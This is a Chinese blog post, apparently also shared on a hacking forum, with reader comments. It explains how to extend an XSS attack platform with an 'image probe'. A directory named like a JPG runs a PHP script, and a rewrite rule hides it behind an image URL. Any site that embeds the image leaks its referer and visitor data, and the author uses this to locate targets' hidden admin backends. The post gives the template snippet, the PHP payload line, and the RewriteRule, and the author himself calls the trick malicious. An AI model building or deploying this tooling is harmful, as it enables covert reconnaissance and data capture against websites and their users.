A-A+

骚操作实现XSS平台图片探测功能

2018年07月08日 15:41 漏洞安全 评论 13 条 共2247字 (阅读7,540 views次)

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

【闲言碎语】这里是废话,不愿意看的直接看下面的正文。有很多朋友都下载了 https://www.t00ls.net/thread-35990-1-1.html  XSS平台源码。。。虽然我本人对TB无欲无求,但是有些朋友的做法让我很无奈,更改了一个功能或者添加了一个插件,然后就重新把源码打包放到论坛了,然后还收5TB的下载费用。。。你这让收20TB的我情何以堪???我不要面子么?!不过看完电影《我不是药神》,算了,可能我要价太高了。。。收到了很多朋友的反馈,我也相继发表了很多很多关于XSS平台的使用、功能等等等等相关文章。也都收到朋友们的各种私信。也又朋友看到了我记录更新的最新XSS平台,希望我能放出源码。。。其实我自用的XSS平台里面很有很多我个人的小骚操作,有些功能咋说呢。。。感觉思路挺骚的,暂时还没想放出,以后慢慢来好吧。。。感谢大家吧。

 

【前言】土司10周年了。我来土司也有一段时间了,感谢土司的这个平台,让我能认识大家,能让我在群“车”中有一个位置,谢谢土司,谢谢大家。最后希望土司论坛越来越好,期待土司的“百年有我”,今天特献此文给大家,让你看到XSS骚的风范。。。很多时候,大家找到某个网站的漏洞却找不到后台地址,然后本人发了两篇文章:https://www.t00ls.net/thread-38560-1-1.html     https://woj.app/1785.html   专门讲找另类网站找后台。今天正式奉献思路、奉献源码。让你的XSS平台安全的实现“图片探测功能”

 

【正文】相信大家看了上面XSS找后台的案例,应该已经明白大致的思路了,就是通过模拟图片,然后获取来路而已。那么如何实现?有的朋友说把JPG以PHP方式执行,其实这样很不安全。

思路:首先可以建立一个xxx.jpg文件夹,然后在这个文件夹下放index.php文件(这个是默认的首页文件,当然这个可以自己设置),
这样,别人访问 http://www.xss.com/xxx.jpg/   等同于访问  http://www.xss.com/xxx.jpg/index.php 
其实说到这里你的思路就应该已经打开了。如果我们在通过伪静态去掉最后一个 /
那么是不是访问 http://www.xss.com/xxx.jpg  实际等同于访问  http://www.xss.com/xxx.jpg/index.php

这个满满的恶意的小骚操作是不是很阔以??????好那下面讲讲XSS平台如何实现这个功能。这里,如果你是下载我所提供的源码,那么你直接可以下载本文附件,然后解压覆盖到你的平台,增加一个“伪静态”规则就可以了。如果不是本人提供的源码,那你可以按照下方提供的更改思路来操作。

 

[再次说明,如果你的平台已经有大的改动,那么你可以看下面的文字叙述照着更改,如果你的平台直接是用的源码,没有太大的改动,那么直接覆盖附件里面的文件就可以!!!!!!]

第一步,找到  themes\default\templates\project_viewcode.html 这个文件。

然后添加如下代码(注意图片中已经给出大概在文件的第多少行添加):

图片XSS展示代码

图片XSS展示代码

代码内容:

1
2
3
4
5
6
7
<hr/><hr/>
<p style="color: #ff0000;"> 
↓↓↓图片探测系统,只要对方网站可以调用外部图片(或可自定义HTML),请填入下方图片地址(代码),则探测对方数据↓↓↓<br/></p> 
图片插件一:&nbsp; &nbsp; <b style="color: #0012ff;">{$codeurl}/picc.jpg </b> &nbsp; &nbsp;【<a href="https://woj.app/1785.html" target="_blank">若使用此探测,必须勾选‘默认模块’!!!点击查看使用说明</a>】<!-- 这里只是这个图片XSS功能说明地址,你可以自己更改成你的地址或者删掉这个解释说明 -->
<p> 
<pre>
{$imgxss}

第二步:找到 source\project.php 这个文件。
然后添加如下代码(注意图片中已经给出大概在文件的第多少行添加):

图片XSS功能处

图片XSS功能处


代码内容:

1
2
3
4
//这里新增了个图片XSS的展示代码
$imgxss=StripStr("<Img sRC=".$longUrl."/picc.jpg>");
 
$smarty->assign('imgxss',$imgxss);

第三部:增加功能文件。如下图,这个文件夹及实现功能的文件我已经打包放入到本文中。自行下载。

图片XSS功能实现文件夹

图片XSS功能实现文件夹

咱们看一下文件夹里有哪些文件。如下图:

pic xss实现

pic xss实现

最后一步:伪静态规则。


RewriteRule ^([0-9a-zA-Z]{1,6})/picc.jpg$ picc.jpg/index.php?Key=$1

好了,到这里就结束了,再次说一遍,如果你用的不是我提供的源码平台,请自行用思路造轮子,如果你用的是我提供的XSS平台的源码,那么请直接下载附件,然后放到平台根目录覆盖即可。。。!!! 看不懂多看两遍,相信看懂了你会收获很多。
看完了文章,如果觉得还可以请给个回复或者“顶”一下,如果写的不好,那就路过。。。。。。如果你连好评都懒得给,那遇到问题你想想别人会不会给你解答吧。提升一下“境界”嘛。。。附件RAR中也呦注释,自己看吧。

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

13 条留言  访客:11 条  博主:2 条

  1. saya

    好文章 学习了 回去试试

  2. 布丁

    关注了 感谢技术分享 附件在哪里呢

  3. R3start

    这思路看得我兴奋不已,楼主牛逼。 感谢分享

  4. 布丁

    附件没看到

  5. aoc

    最近也在研究IMG类型xss,感谢分享

  6. 阿萨德

    阿萨德

  7. 阿萨德

    好文章 学习了 回去试试附件RAR

  8. 阿萨德

    境界

  9. jun

    第一次知道还能这样,但是附件在哪里下载呀

  10. 阿斯顿

    附件在哪里下载?

    • gdd

      ~~建议按照文章自己弄, 如果非要下载,地址是:https://www.t00ls.net/thread-46725-1-1.html

  11. gg

    附件在哪里下载?

    • gdd

      建议按照文章自己弄, 如果非要下载,地址是:https://www.t00ls.net/thread-46725-1-1.html

给我留言取消回复